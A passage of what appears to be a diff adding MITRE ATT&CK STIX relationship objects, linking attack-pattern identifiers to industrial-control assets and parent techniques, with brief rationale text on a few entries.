"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--d467bc38-284b-4a00-96ac-125f447799fc", + "target_ref": "attack-pattern--cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--48f81d26-b9c8-4c02-bf35-31c07e8277a4", + "created": "2024-07-02T13:55:55.753Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.753Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--48fe187c-471a-45d5-bade-34a0a2a4a264", + "created": "2024-07-02T13:55:55.750Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.750Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4901932a-b1ca-40b9-b222-b195ce61ae68", + "created": "2024-06-21T14:12:20.255Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.255Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0f20e3cb-245b-4a61-8a91-2d93f7cb0e9b", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--490ec3a5-d7e5-4d75-840e-652bf6b2e7a9", + "created": "2024-05-22T17:22:34.371Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-28T01:47:48.386Z", + "description": "Asset Mapping Rationale: Adversaries may use credentials obtained from breach dumps of unrelated accounts to gain access to target accounts through credential overlap. Typically, management services over commonly used ports are used when stuffing credentials. ", + "relationship_type": "targets", + "source_ref": "attack-pattern--b2d03cea-aec1-45ca-9744-9ee583c1e1cc", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--491c6bbd-3ca5-4e79-a35a-ef00625cb7e7", + "created": "2022-03-04T18:56:38.982Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-05-24T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--bed04f7d-e48a-4e76-bd0f-4c57fe31fc46", + "target_ref": "attack-pattern--67073dde-d720-45ae-83da-b12d5e73ca3b", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4923276f-4505-42a0-94b6-de436184b011", + "created": "2024-07-02T13:55:55.749Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.749Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--49242ea8-4813-49f7-8bd4-9668216cceeb", + "created": "2023-09-29T16:45:53.300Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T16:45:53.300Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3b6b9246-43f8-4c69-ad7a-2b11cfe0a0d9", + "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4966463f-41f1-48de-83d5-1c2c97acfff7", + "created": "2024-06-21T14:12:20.272Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.272Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7bd9c723-2f78-4309-82c5-47cad406572b", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--496b2565-c0fb-4de7-8446-e8125bfa4f28", + "created": "2020-02-21T21:17:03.463Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--241814ae-de3f-4656-b49e-f9a80764d4b7", + "target_ref": "attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--49713642-96c3-436f-9988-19f2d7233317", + "created": "2024-06-21T14:12:20.262Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.262Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c1b68a96-3c48-49ea-a6c0-9b27359f9c19", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4973ba80-23e4-4b83-9295-352fe8e6d451", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--36b2a1d7-e09e-49bf-b45e-477076c2ec01", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4981a944-b3ad-4d78-9881-a17d458e3422", + "created": "2023-09-28T20:01:30.138Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T20:01:30.138Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b14395bd-5419-4ef4-9bd8-696936f509bb", + "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4982a882-c8e9-45e4-9bd9-710281de885d", + "created": "2024-06-21T14:12:20.256Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.256Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4983ee34-29be-419e-aec9-9074c9a99450", + "created": "2024-06-21T14:12:20.263Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.263Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d456de47-a16f-4e46-8980-e67478a12dcb", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--498fc6ea-28c1-4833-bab9-84ebdff8ace8", + "created": "2024-07-02T13:55:55.764Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.764Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--435dfb86-2697-4867-85b5-2fef496c0517", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4995479d-2d59-4ca0-b6d0-c86a82bbad65", + "created": "2024-05-22T17:18:01.244Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-28T02:03:00.842Z", + "description": "Asset Mapping Rationale: Adversaries may install an older version of the operating system of a network device to weaken security. Older operating system versions on network devices often have weaker encryption ciphers and, in general, fewer/less updated defensive features.", + "relationship_type": "targets", + "source_ref": "attack-pattern--fc74ba38-dc98-461f-8611-b3dbf9978e3d", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--49b4c81a-3cb8-444e-ac3a-0c30a00f6245", + "created": "2024-06-21T14:12:20.271Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.271Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--5909f20f-3c39-4795-be06-ef1ea40d350b", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--49c1293b-b6a5-4c18-acd5-d5f14824ff3f", + "created": "2024-06-21T14:12:20.274Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.274Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c2e147a9-d1a8-4074-811a-d8789202d916", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--49c28aef-b7a2-464f-af3d-e104f9edf119", + "created": "2020-02-10T20:30:07.540Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--7bdca9d5-d500-4d7d-8c52-5fd47baf4c0c", + "target_ref": "attack-pattern--42e8de7b-37b2-4258-905a-6897815e58e0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--49d9590a-bbbf-4701-a263-818d4db0216d", + "created": "2024-07-02T13:55:55.748Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.748Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2f41939b-54c3-41d6-8f8b-35f1ec18ed97", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4a172b74-3780-4a25-a1bc-26a5d1a49129", + "created": "2024-07-02T13:55:55.771Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.771Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4a223e43-cdfe-4fd9-bd70-007f6ae6893c", + "created": "2024-07-02T13:55:55.748Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.748Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--39131305-9282-45e4-ac3b-591d2d4fc3ef", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4a317bab-3c55-4e23-ba2c-60e14f184021", + "created": "2024-06-21T14:12:20.265Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.265Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--09b130a2-a77e-4af0-a361-f46f9aad1345", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4a37daf1-3692-48a9-86fc-0b6af354e148", + "created": "2024-07-02T13:55:55.760Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.760Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4a449260-9548-4f2c-9180-e54810bdd356", + "created": "2024-06-27T09:09:34.171Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:09:34.171Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4a45390b-1128-4443-b5bf-c1823654e8df", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4a641966-3cc8-4dd6-aa61-1a96cfff4a05", + "created": "2023-09-28T19:41:47.648Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T19:41:47.648Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b0628bfc-5376-4a38-9182-f324501cb4cf", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4a7340fc-0eec-4459-a491-952d736b79ef", + "created": "2023-09-28T19:50:42.505Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T19:50:42.505Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e6c31185-8040-4267-83d3-b217b8a92f07", + "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4a73a308-45aa-4dcd-9253-c15a065fac84", + "created": "2020-01-14T17:18:32.236Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--0042a9f5-f053-4769-b3ef-9ad018dfa298", + "target_ref": "attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4a870b83-244c-4879-81d7-bd070829267a", + "created": "2024-07-02T13:55:55.754Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.754Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--5d2be8b9-d24c-4e98-83bf-2f5f79477163", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4a87339b-0f40-4005-b4f8-5ffe5e6ede97", + "created": "2024-07-02T13:55:55.759Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.759Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4a96d822-28cc-4820-8fb0-d7a049547bc9", + "created": "2020-02-05T20:08:34.091Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be", + "target_ref": "attack-pattern--120d5519-3098-4e1c-9191-2aa61232f073", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4a9addc9-ab77-4c45-9423-b825da0776e6", + "created": "2024-07-02T13:55:55.750Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.750Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a10641f4-87b4-45a3-a906-92a149cb2c27", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4aab4887-1215-4f82-b483-976ec46e0432", + "created": "2024-07-02T13:55:55.753Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.753Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3fc9b85a-2862-4363-a64d-d692e3ffbee0", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4ab2b092-a8c3-4728-9d3d-806c1ddb4796", + "created": "2020-03-27T21:50:26.220Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--c92e3d68-2349-49e4-a341-7edca2deff96", + "target_ref": "attack-pattern--ff25900d-76d5-449b-a351-8824e62fc81b", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4abac896-0941-42c7-be95-87a9ef528371", + "created": "2024-06-26T19:25:14.208Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T19:25:14.208Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e848506b-8484-4410-8017-3d235a52f5b3", + "target_ref": "x-mitre-asset--7818eb69-414c-43d2-9816-77e90a710edc", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4ad48410-efd9-41c0-ac59-e4343d3b9198", + "created": "2023-09-28T21:09:50.956Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T21:09:50.956Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1c478716-71d9-46a4-9a53-fa5d576adb60", + "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--4ae73c5d-5b28-48bc-8ffb-6ef8df828c04", + "created": "2024-06-21T14:12:20.265Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + 